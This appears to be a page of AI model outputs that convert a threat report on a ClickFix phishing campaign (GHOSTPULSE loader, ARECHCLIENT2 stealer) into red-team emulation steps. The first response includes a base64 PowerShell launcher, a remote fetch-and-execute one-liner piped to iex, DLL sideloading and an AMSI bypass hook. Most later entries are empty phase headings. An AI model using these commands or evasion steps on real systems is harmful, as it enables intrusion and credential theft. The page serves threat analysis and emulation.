Model: gemini-2.5-flash-preview-05-20 Here's a structured breakdown of the threat actor's procedures, suitable for red team emulation, with IOCs excluded: Phase: Initial Access Technique: User Interaction / Phishing / Spearphishing Link User Execution Procedure: The attacker presents a fake CAPTCHA verification page, prompting the user to "verify they are human." Procedure: The user is tricked into performing a sequence of actions: Press `Windows Button + R` (to open the Run dialog). Press `CTRL + V` (to paste a malicious PowerShell command that has been copied to the clipboard by the webpage's JavaScript). Press `Enter` (to execute the pasted PowerShell command). Phase: Execution Technique: Command and Scripting Interpreter (PowerShell) / Malicious Link Command: `powershell -ep bypass -enc <Base64_Encoded_PowerShell_Command>` Decoded Command (First-Stage Fetcher): `(Invoke-webrequest -URI 'hxxps://<shorter_url>' -UseBasicParsing).content \| iex` Description: This command fetches and executes a subsequent PowerShell script from a remote URL. Technique: Command and Scripting Interpreter (PowerShell) / Malicious File Command (Second-Stage Downloader/Extractor): `powershell Invoke-WebRequest -Uri "hxxps://<malicious_url>" -OutFile "$env:TEMP\ComponentStyle.zip" Expand-Archive -Path "$env:TEMP\ComponentStyle.zip" -DestinationPath "$env:TEMP" & "$env:TEMP\crystall\Crysta_x86.exe"` Description: This script downloads a ZIP archive, extracts its contents to the user's temporary directory, and then executes a legitimate executable that is leveraged for DLL sideloading. Technique: DLL Sideloading Procedure: A legitimate executable (e.g., `Crysta_x86.exe`) is launched, which then sideloads a malicious DLL (e.g., `DivXDownloadManager.dll`) located in the same directory. Technique: Ingress Tool Transfer / Deobfuscation/Decoding Procedure: The GHOSTPULSE loader decrypts an additional encrypted file (e.g., `Shonomteak.bxi`) using a DWORD addition operation with an embedded key. Technique: Reflective Loading / Process Injection Procedure: GHOSTPULSE extracts the next stage code from the decrypted file and injects it into a loaded library (e.g., `vssapi.dll`) using a library loading function. Procedure: An x86 native .NET loader is reflectively loaded into memory using the `CLRCreateInstance` Windows API. Phase: Defense Evasion Technique: Deobfuscation/Decoding Procedure: Malicious JavaScript on the phishing page is heavily obfuscated, and PowerShell commands are base64-encoded. Technique: Anti-Analysis (Process Discovery) Procedure: The malware checks for a predefined list of processes. If any are detected, execution is delayed by 5 seconds. API Call (Internal): `exec_NtDelayExecution(...)` Technique: Impair Defenses (AMSI Bypass) Procedure: The .NET loader sets up a hook on the `LoadLibraryExW` API. Upon `amsi.dll` being loaded, it then hooks `AmsiScanBuffer 0` to bypass AMSI. Phase: Collection Technique: System Information Discovery Procedure: The malware gathers extensive system details, including operating system version, hardware information, local IP address, machine name, geolocation (city, country, time zone). Technique: Steal Web Session Cookie Procedure: ARECHCLIENT2 targets browser-saved passwords, cookies, and autofill data. Technique: Credential Dumping Procedure: ARECHCLIENT2 targets credentials from cryptocurrency wallets, FTP clients, VPN clients, Telegram, Discord, and Steam. Phase: Command and Control Technique: Application Layer Protocol (HTTPS/HTTP) Procedure: ARECHCLIENT2 connects to its primary and secondary command-and-control (C2) servers to receive and execute commands. Procedure: The C2 infrastructure appears to use a reverse proxy to protect the actual C2 server, leveraging disposable front-end redirectors.

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of the threat actor's procedures, suitable for red team emulation, with IOCs excluded:

Phase: Initial Access

Technique: User Interaction / Phishing / Spearphishing Link User Execution
- Procedure: The attacker presents a fake CAPTCHA verification page, prompting the user to "verify they are human."
- Procedure: The user is tricked into performing a sequence of actions:
  1. Press Windows Button + R (to open the Run dialog).
  2. Press CTRL + V (to paste a malicious PowerShell command that has been copied to the clipboard by the webpage's JavaScript).
  3. Press Enter (to execute the pasted PowerShell command).

Phase: Execution

Technique: Command and Scripting Interpreter (PowerShell) / Malicious Link
- Command: powershell -ep bypass -enc <Base64_Encoded_PowerShell_Command>
- Decoded Command (First-Stage Fetcher): (Invoke-webrequest -URI 'hxxps://<shorter_url>' -UseBasicParsing).content | iex
  - Description: This command fetches and executes a subsequent PowerShell script from a remote URL.
Technique: Command and Scripting Interpreter (PowerShell) / Malicious File
- Command (Second-Stage Downloader/Extractor): powershell Invoke-WebRequest -Uri "hxxps://<malicious_url>" -OutFile "$env:TEMP\ComponentStyle.zip" Expand-Archive -Path "$env:TEMP\ComponentStyle.zip" -DestinationPath "$env:TEMP" & "$env:TEMP\crystall\Crysta_x86.exe"
  - Description: This script downloads a ZIP archive, extracts its contents to the user's temporary directory, and then executes a legitimate executable that is leveraged for DLL sideloading.
Technique: DLL Sideloading
- Procedure: A legitimate executable (e.g., Crysta_x86.exe) is launched, which then sideloads a malicious DLL (e.g., DivXDownloadManager.dll) located in the same directory.
Technique: Ingress Tool Transfer / Deobfuscation/Decoding
- Procedure: The GHOSTPULSE loader decrypts an additional encrypted file (e.g., Shonomteak.bxi) using a DWORD addition operation with an embedded key.
Technique: Reflective Loading / Process Injection
- Procedure: GHOSTPULSE extracts the next stage code from the decrypted file and injects it into a loaded library (e.g., vssapi.dll) using a library loading function.
- Procedure: An x86 native .NET loader is reflectively loaded into memory using the CLRCreateInstance Windows API.

Phase: Defense Evasion

Technique: Deobfuscation/Decoding
- Procedure: Malicious JavaScript on the phishing page is heavily obfuscated, and PowerShell commands are base64-encoded.
Technique: Anti-Analysis (Process Discovery)
- Procedure: The malware checks for a predefined list of processes. If any are detected, execution is delayed by 5 seconds.
- API Call (Internal): exec_NtDelayExecution(...)
Technique: Impair Defenses (AMSI Bypass)
- Procedure: The .NET loader sets up a hook on the LoadLibraryExW API. Upon amsi.dll being loaded, it then hooks AmsiScanBuffer 0 to bypass AMSI.

Phase: Collection

Technique: System Information Discovery
- Procedure: The malware gathers extensive system details, including operating system version, hardware information, local IP address, machine name, geolocation (city, country, time zone).
Technique: Steal Web Session Cookie
- Procedure: ARECHCLIENT2 targets browser-saved passwords, cookies, and autofill data.
Technique: Credential Dumping
- Procedure: ARECHCLIENT2 targets credentials from cryptocurrency wallets, FTP clients, VPN clients, Telegram, Discord, and Steam.

Phase: Command and Control

Technique: Application Layer Protocol (HTTPS/HTTP)
- Procedure: ARECHCLIENT2 connects to its primary and secondary command-and-control (C2) servers to receive and execute commands.
- Procedure: The C2 infrastructure appears to use a reverse proxy to protect the actual C2 server, leveraging disposable front-end redirectors.

A Wretch Client: From ClickFix deception to information stealer deployment

Model: gpt-4o

Phase: Initial Access

Phase: Execution

Phase: Delivery

Phase: Malware Deployment

Phase: Evasion

Model: gpt-4o

Phase: Initial Access

Phase: Execution

Phase: Delivery of Payload

Phase: Payload Deployment

Phase: Impact

Model: gpt-4o

Phase: Initial Access

Phase: Execution

Likely Command (inferred):

Malware Loader

Model: gpt-4o

Phase: Execution

Phase: Execution

Inferred Command (likely based on behavior described)

Model: gpt-4o

Phase: Execution

Phase: Execution

Phase: Persistence (Via DLL Sideloading)

Phase: Execution (Stage 1)

Model: gpt-4o

Phase: Initial Access

Phase: Execution

Phase: Configuration Injection

Phase: Defense Evasion

Phase: Reconnaissance

Phase: Payload Storage

Model: gpt-4o

Phase: Initial Access

Phase: Execution

Phase: Defense Evasion

Phase: Error Handling and Debugging

Model: gpt-4o

Phase: Execution

Phase: Credential Access

Phase: Discovery

Model: gpt-4o

Phase: Initial Access

Phase: Command and Control

Phase: Attack Infrastructure Setup

Additional Considerations:

Model: gpt-4o

Phase: Command and Control

Phase: Infrastructure Analysis

Model: gpt-4o

Phase: Infrastructure Setup

Phase: Operational Resilience

Model: gpt-4o

Phase: Initial Access

Phase: Execution

Phase: Persistence

Phase: Command and Control

Phase: Defense Evasion

Model: gpt-4o

Phase: Initial Access

Phase: Execution

Phase: Defense Evasion

Phase: Persistence

Phase: Execution (Continued)

Phase: Command and Control

Phase: Collection

Phase: Impact

Model: gpt-4o

Phase: Execution

Phase: Defense Evasion

Phase: Initial Access

Phase: Discovery

Phase: Credential Access

Phase: Impact

Model: gemini-2.0-flash

Phase: Initial Access

Phase: Execution

Phase: Payload Deployment